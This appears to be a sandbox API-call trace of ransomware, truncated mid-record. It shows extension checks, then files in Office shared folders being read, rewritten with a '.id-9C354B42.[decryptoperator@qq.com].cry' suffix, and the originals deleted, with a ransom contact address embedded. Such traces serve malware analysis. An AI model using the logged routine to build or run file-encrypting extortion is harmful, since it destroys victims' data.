[0052.900] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.900] lstrlenW (lpString=".1cd") returned 4 [0052.901] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.901] lstrlenW (lpString=".jpg") returned 4 [0052.901] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.901] lstrlenW (lpString=".doc") returned 4 [0052.901] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.901] lstrlenW (lpString=".docx") returned 5 [0052.901] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0052.901] lstrlenW (lpString=".pdf") returned 4 [0052.901] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.901] lstrlenW (lpString=".xls") returned 4 [0052.901] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.901] lstrlenW (lpString=".xlsx") returned 5 [0052.901] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0052.901] lstrlenW (lpString=".ppt") returned 4 [0052.901] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.901] lstrlenW (lpString=".zip") returned 4 [0052.901] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.901] lstrlenW (lpString=".rar") returned 4 [0052.901] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.901] lstrlenW (lpString=".bz2") returned 4 [0052.901] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.901] lstrlenW (lpString=".7z") returned 3 [0052.901] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.901] lstrlenW (lpString=".dbf") returned 4 [0052.901] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.901] lstrlenW (lpString=".1cd") returned 4 [0052.902] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.902] lstrlenW (lpString=".jpg") returned 4 [0052.902] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.902] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.902] lstrlenW (lpString="InputPersonalization.exe.mui") returned 28 [0052.902] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.085] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=2560) returned 1 [0053.085] CloseHandle (hObject=0x224) returned 1 [0053.085] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui")) returned 0x20 [0053.085] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.085] lstrlenW (lpString=".doc") returned 4 [0053.085] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.085] lstrlenW (lpString=".docx") returned 5 [0053.085] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0053.085] lstrlenW (lpString=".pdf") returned 4 [0053.085] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.085] lstrlenW (lpString=".xls") returned 4 [0053.085] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.085] lstrlenW (lpString=".xlsx") returned 5 [0053.085] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0053.085] lstrlenW (lpString=".ppt") returned 4 [0053.085] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.085] lstrlenW (lpString=".zip") returned 4 [0053.085] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.085] lstrlenW (lpString=".rar") returned 4 [0053.085] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.085] lstrlenW (lpString=".bz2") returned 4 [0053.085] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.085] lstrlenW (lpString=".7z") returned 3 [0053.085] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.086] lstrlenW (lpString=".dbf") returned 4 [0053.086] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.086] lstrlenW (lpString=".1cd") returned 4 [0053.086] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.086] lstrlenW (lpString=".jpg") returned 4 [0053.086] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.086] lstrlenW (lpString=".doc") returned 4 [0053.086] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0053.086] lstrlenW (lpString=".docx") returned 5 [0053.086] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0053.086] lstrlenW (lpString=".pdf") returned 4 [0053.086] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0053.086] lstrlenW (lpString=".xls") returned 4 [0053.086] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0053.086] lstrlenW (lpString=".xlsx") returned 5 [0053.086] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0053.086] lstrlenW (lpString=".ppt") returned 4 [0053.086] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0053.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.086] lstrlenW (lpString=".zip") returned 4 [0053.086] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0053.086] lstrlenW (lpString=".rar") returned 4 [0053.086] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0053.086] lstrlenW (lpString=".bz2") returned 4 [0053.086] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0053.086] lstrlenW (lpString=".7z") returned 3 [0053.086] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0053.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.086] lstrlenW (lpString=".dbf") returned 4 [0053.086] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.086] lstrlenW (lpString=".1cd") returned 4 [0053.086] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0053.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 85 [0053.086] lstrlenW (lpString=".jpg") returned 4 [0053.087] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0053.087] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.087] lstrlenW (lpString="ACERECR.DLL") returned 11 [0053.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.087] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=20944) returned 1 [0053.087] CloseHandle (hObject=0x224) returned 1 [0053.087] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll")) returned 0x20 [0053.087] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.087] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.087] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.088] GetLastError () returned 0x0 [0053.088] ReadFile (in: hFile=0x224, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x51d0, lpOverlapped=0x0) returned 1 [0053.195] WriteFile (in: hFile=0x218, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x51e0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x51e0, lpOverlapped=0x0) returned 1 [0053.196] ReadFile (in: hFile=0x224, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.196] WriteFile (in: hFile=0x218, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0053.197] SetEndOfFile (hFile=0x218) returned 1 [0053.197] CloseHandle (hObject=0x218) returned 1 [0053.201] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.201] SetEndOfFile (hFile=0x224) returned 1 [0053.202] CloseHandle (hObject=0x224) returned 1 [0053.202] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.202] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll")) returned 1 [0053.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.202] lstrlenW (lpString=".doc") returned 4 [0053.202] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.202] lstrlenW (lpString=".docx") returned 5 [0053.202] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.203] lstrlenW (lpString=".pdf") returned 4 [0053.203] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.203] lstrlenW (lpString=".xls") returned 4 [0053.203] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.203] lstrlenW (lpString=".xlsx") returned 5 [0053.203] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.203] lstrlenW (lpString=".ppt") returned 4 [0053.203] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.203] lstrlenW (lpString=".zip") returned 4 [0053.203] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.203] lstrlenW (lpString=".rar") returned 4 [0053.203] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.203] lstrlenW (lpString=".bz2") returned 4 [0053.203] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.203] lstrlenW (lpString=".7z") returned 3 [0053.203] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.203] lstrlenW (lpString=".dbf") returned 4 [0053.203] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.203] lstrlenW (lpString=".1cd") returned 4 [0053.203] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.204] lstrlenW (lpString=".jpg") returned 4 [0053.204] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.204] lstrlenW (lpString=".doc") returned 4 [0053.204] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.204] lstrlenW (lpString=".docx") returned 5 [0053.204] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.204] lstrlenW (lpString=".pdf") returned 4 [0053.204] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.204] lstrlenW (lpString=".xls") returned 4 [0053.204] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.204] lstrlenW (lpString=".xlsx") returned 5 [0053.204] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.204] lstrlenW (lpString=".ppt") returned 4 [0053.204] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.204] lstrlenW (lpString=".zip") returned 4 [0053.204] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.204] lstrlenW (lpString=".rar") returned 4 [0053.204] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.204] lstrlenW (lpString=".bz2") returned 4 [0053.204] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.204] lstrlenW (lpString=".7z") returned 3 [0053.204] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.204] lstrlenW (lpString=".dbf") returned 4 [0053.204] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.205] lstrlenW (lpString=".1cd") returned 4 [0053.205] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72 [0053.205] lstrlenW (lpString=".jpg") returned 4 [0053.205] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.205] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0053.205] lstrlenW (lpString="ALRTINTL.DLL") returned 12 [0053.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.205] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=154448) returned 1 [0053.205] CloseHandle (hObject=0x224) returned 1 [0053.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll")) returned 0x20 [0053.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0053.206] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.206] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.206] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0053.206] GetLastError () returned 0x0 [0053.206] ReadFile (in: hFile=0x224, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x25b50, lpOverlapped=0x0) returned 1 [0053.232] WriteFile (in: hFile=0x16c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x25b60, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x25b60, lpOverlapped=0x0) returned 1 [0053.235] ReadFile (in: hFile=0x224, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.235] WriteFile (in: hFile=0x16c, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.235] SetEndOfFile (hFile=0x16c) returned 1 [0053.235] CloseHandle (hObject=0x16c) returned 1 [0053.235] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.235] SetEndOfFile (hFile=0x224) returned 1 [0053.237] CloseHandle (hObject=0x224) returned 1 [0053.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.237] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll")) returned 1 [0053.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.238] lstrlenW (lpString=".doc") returned 4 [0053.238] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.238] lstrlenW (lpString=".docx") returned 5 [0053.238] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0053.238] lstrlenW (lpString=".pdf") returned 4 [0053.238] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.238] lstrlenW (lpString=".xls") returned 4 [0053.238] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.238] lstrlenW (lpString=".xlsx") returned 5 [0053.238] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0053.238] lstrlenW (lpString=".ppt") returned 4 [0053.238] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.238] lstrlenW (lpString=".zip") returned 4 [0053.238] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.238] lstrlenW (lpString=".rar") returned 4 [0053.238] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.238] lstrlenW (lpString=".bz2") returned 4 [0053.238] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.238] lstrlenW (lpString=".7z") returned 3 [0053.238] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.238] lstrlenW (lpString=".dbf") returned 4 [0053.238] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.238] lstrlenW (lpString=".1cd") returned 4 [0053.238] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.238] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.238] lstrlenW (lpString=".jpg") returned 4 [0053.238] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.239] lstrlenW (lpString=".doc") returned 4 [0053.239] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.239] lstrlenW (lpString=".docx") returned 5 [0053.239] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0053.239] lstrlenW (lpString=".pdf") returned 4 [0053.239] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.239] lstrlenW (lpString=".xls") returned 4 [0053.239] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.239] lstrlenW (lpString=".xlsx") returned 5 [0053.239] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0053.239] lstrlenW (lpString=".ppt") returned 4 [0053.239] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.239] lstrlenW (lpString=".zip") returned 4 [0053.239] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.239] lstrlenW (lpString=".rar") returned 4 [0053.239] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.239] lstrlenW (lpString=".bz2") returned 4 [0053.239] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.239] lstrlenW (lpString=".7z") returned 3 [0053.239] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.239] lstrlenW (lpString=".dbf") returned 4 [0053.239] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.239] lstrlenW (lpString=".1cd") returned 4 [0053.239] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0053.239] lstrlenW (lpString=".jpg") returned 4 [0053.239] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.240] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".cry") returned 1 [0053.240] lstrlenW (lpString="MSOINTL.DLL.IDX_DLL") returned 19 [0053.240] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: 